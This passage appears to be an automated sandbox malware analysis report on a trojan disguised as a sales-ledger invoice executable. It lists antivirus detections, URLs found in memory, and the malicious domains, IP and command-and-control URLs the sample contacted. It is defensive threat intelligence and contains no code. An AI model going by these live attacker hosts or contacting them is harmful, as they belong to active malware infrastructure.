                  C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\AdvancedRun.exe3%MetadefenderBrowse
                  C:\Users\user\AppData\Local\Temp\AdvancedRun.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe29%ReversingLabsByteCode-MSIL.Trojan.Wacatac

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://www.jiyu-kobo.co.jp/s200%Avira URL Cloudsafe
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://ocsp.sectigo.com00%URL Reputationsafe
                  http://ocsp.sectigo.com00%URL Reputationsafe
                  http://ocsp.sectigo.com00%URL Reputationsafe
                  http://www.tiro.com0%URL Reputationsafe
                  http://www.tiro.com0%URL Reputationsafe
                  http://www.tiro.com0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/Pi0%Avira URL Cloudsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
                  http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
                  http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
                  http://www.fontbureau.coml10%URL Reputationsafe
                  http://www.fontbureau.coml10%URL Reputationsafe
                  http://www.fontbureau.coml10%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/-cz0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/-cz0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/-cz0%URL Reputationsafe
                  http://www.seniorlivingcaelderly.com/suod/0%Avira URL Cloudsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.typography.netD0%URL Reputationsafe
                  http://www.typography.netD0%URL Reputationsafe
                  http://www.typography.netD0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://fontfabrik.com0%URL Reputationsafe
                  http://fontfabrik.com0%URL Reputationsafe
                  http://fontfabrik.com0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/Y0e0%Avira URL Cloudsafe
                  https://sectigo.com/CPS0C0%URL Reputationsafe
                  https://sectigo.com/CPS0C0%URL Reputationsafe
                  https://sectigo.com/CPS0C0%URL Reputationsafe
                  https://sectigo.com/CPS0D0%URL Reputationsafe
                  https://sectigo.com/CPS0D0%URL Reputationsafe
                  https://sectigo.com/CPS0D0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.seniorlivingcaelderly.com/suod/?RL0=uVgD4bu0-2R4Or&Sxo=LsHPYRuctkoWulzKyGbvgGfg2m0Ehvoa2gaw5h/iu275rsWI7O6TvqToE0BPOi46d4K30%Avira URL Cloudsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  www.consultoramulticars.com/suod/0%Avira URL Cloudsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/jp/5i0%Avira URL Cloudsafe
                  http://www.sakkal.com0%URL Reputationsafe
                  http://www.sakkal.com0%URL Reputationsafe
                  http://www.sakkal.com0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/-czti0%Avira URL Cloudsafe
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/d.0%Avira URL Cloudsafe
                  http://www.seniorlivingcaelderly.com0%Avira URL Cloudsafe
                  http://www.galapagosdesign.com/staff/dennis.htmcP0%Avira URL Cloudsafe
                  https://go.micro0%URL Reputationsafe
                  https://go.micro0%URL Reputationsafe
                  https://go.micro0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/jp/fi0%Avira URL Cloudsafe
                  http://www.jiyu-kobo.co.jp/Bi)0%Avira URL Cloudsafe
                  http://www.founder.com.cn/cnto0%Avira URL Cloudsafe
                  http://www.jiyu-kobo.co.jp/jp/q0%Avira URL Cloudsafe
                  http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                  http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                  http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                  http://james.newtonking.com/projects/json0%URL Reputationsafe
                  http://james.newtonking.com/projects/json0%URL Reputationsafe
                  http://james.newtonking.com/projects/json0%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                  http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                  http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/Y0ftYi0%Avira URL Cloudsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/q0%Avira URL Cloudsafe
                  http://www.jiyu-kobo.co.jp/Yi0%Avira URL Cloudsafe
                  http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  www.soretyje.com
                  		81.17.18.194
                  		truefalse
                    		unknown
                    www.seniorlivingcaelderly.com
                    		185.53.179.90
                    		truetrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://www.seniorlivingcaelderly.com/suod/true
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.seniorlivingcaelderly.com/suod/?RL0=uVgD4bu0-2R4Or&Sxo=LsHPYRuctkoWulzKyGbvgGfg2m0Ehvoa2gaw5h/iu275rsWI7O6TvqToE0BPOi46d4K3true
                      • Avira URL Cloud: safe
                      		unknown
                      www.consultoramulticars.com/suod/true
                      • Avira URL Cloud: safe
                      		low

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.jiyu-kobo.co.jp/s20Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.242943283.0000000005863000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.fontbureau.com/designersGRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                        		high
                        http://www.msn.com/?ocid=iehpLMEMcmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmpfalse
                          		high
                          http://www.fontbureau.com/designers/?Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                            		high
                            http://www.founder.com.cn/cn/bTheRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://ocsp.sectigo.com0Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.drfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.msn.com/de-ch/?ocid=iehpLMEMhcmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmpfalse
                              		high
                              http://www.fontbureau.com/designers?Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                		high
                                http://www.tiro.comexplorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designersexplorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.jiyu-kobo.co.jp/PiRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.goodfont.co.krRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.msn.com/ocid=iehpcmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.fontbureau.coml1Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.312826232.000000000586A000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.jiyu-kobo.co.jp/-czRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.sajatypeworks.comRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.typography.netDRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.founder.com.cn/cn/cTheRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.galapagosdesign.com/staff/dennis.htmRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://fontfabrik.comRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.jiyu-kobo.co.jp/Y0eRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243557863.000000000586A000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.msn.com/?ocid=iehpcmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp, cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmpfalse
                                      		high
                                      https://sectigo.com/CPS0CRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.drfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      https://sectigo.com/CPS0DRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.drfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.galapagosdesign.com/DPleaseRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fonts.comRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.sandoll.co.krRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.urwpp.deDPleaseRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.nirsoft.net/AdvancedRun.exe, AdvancedRun.exe, 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000015.00000000.299126160.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.0.drfalse
                                          		high
                                          http://www.zhongyicts.com.cnRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/jp/5iRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.314738221.0000000002951000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.sakkal.comRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.msn.com/de-ch/ocid=iehpcmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.msn.com/de-ch/?ocid=iehp.cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.msn.com/de-ch/?ocid=iehpjcmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.apache.org/licenses/LICENSE-2.0Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.comRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.jiyu-kobo.co.jp/-cztiRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.msn.com/?ocid=iehpccmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000016.00000003.393538645.0000000007FF4000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.jiyu-kobo.co.jp/d.Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243557863.000000000586A000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.seniorlivingcaelderly.comexplorer.exe, 00000019.00000002.497484764.00000000061E3000.00000040.00000001.sdmp, cmmon32.exe, 00000020.00000002.484792584.0000000005349000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000016.00000003.393538645.0000000007FF4000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://www.galapagosdesign.com/staff/dennis.htmcPRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.312826232.000000000586A000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://go.micropowershell.exe, 00000016.00000003.399833270.0000000005A8D000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.jiyu-kobo.co.jp/jp/fiRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.jiyu-kobo.co.jp/Bi)Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.founder.com.cn/cntoRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.241708507.0000000005871000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.jiyu-kobo.co.jp/jp/qRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.242943283.0000000005863000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.jiyu-kobo.co.jp/jp/Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://github.com/Pester/Pesterpowershell.exe, 00000016.00000003.393538645.0000000007FF4000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://james.newtonking.com/projects/jsonRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324077435.0000000007520000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.newtonsoft.com/jsonschemaRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324077435.0000000007520000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://www.carterandcone.comlRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.msn.com/de-ch/?ocid=iehpcmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp, cmmon32.exe, 00000020.00000003.390090022.00000000030FD000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.fontbureau.com/designers/cabarga.htmlNRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.jiyu-kobo.co.jp/Y0ftYiRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.founder.com.cn/cnRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.fontbureau.com/designers/frere-jones.htmlRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.jiyu-kobo.co.jp/qRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.jiyu-kobo.co.jp/YiRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.fontbureau.comtiRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.312826232.000000000586A000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.jiyu-kobo.co.jp/Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp, Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.fontbureau.com/designers8Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.jiyu-kobo.co.jp/fiRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.jiyu-kobo.co.jp/jp/PiRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243557863.000000000586A000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.jiyu-kobo.co.jp/(iRequire your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown

                                                                      Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      185.53.179.90
                                                                      		www.seniorlivingcaelderly.comGermany
                                                                      		61969TEAMINTERNET-ASDEtrue

                                                                      General Information

                                                                      Joe Sandbox Version:31.0.0 Emerald
                                                                      Analysis ID:385451
                                                                      Start date:12.04.2021
                                                                      Start time:14:38:30
                                                                      Joe Sandbox Product:CloudBasic
                                                                      Overall analysis duration:0h 12m 39s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Sample file name:Require your Sales Ledger from 01-April-2020.exe
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                      Number of analysed new started processes analysed:39
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:1
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • HDC enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@18/14@2/1
                                                                      EGA Information:Failed
                                                                      HDC Information:
                                                                      • Successful, ratio: 14.2% (good quality ratio 13.2%)
                                                                      • Quality average: 78.2%
                                                                      • Quality standard deviation: 28.7%
                                                                      HCA Information:
                                                                      • Successful, ratio: 93%
                                                                      • Number of executed functions: 150
                                                                      • Number of non-executed functions: 327
                                                                      Cookbook Comments:
                                                                      • Adjust boot time
                                                                      • Enable AMSI
                                                                      • Found application associated with file extension: .exe
                                                                      Warnings:
                                                                      Show All
                                                                      • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 20.82.210.154, 13.88.21.125, 92.122.145.220, 184.30.24.56, 20.50.102.62, 104.43.139.144, 2.20.142.210, 2.20.142.209, 92.122.213.247, 92.122.213.194, 52.155.217.156, 20.54.26.129, 52.147.198.201, 52.255.188.83, 13.64.90.137
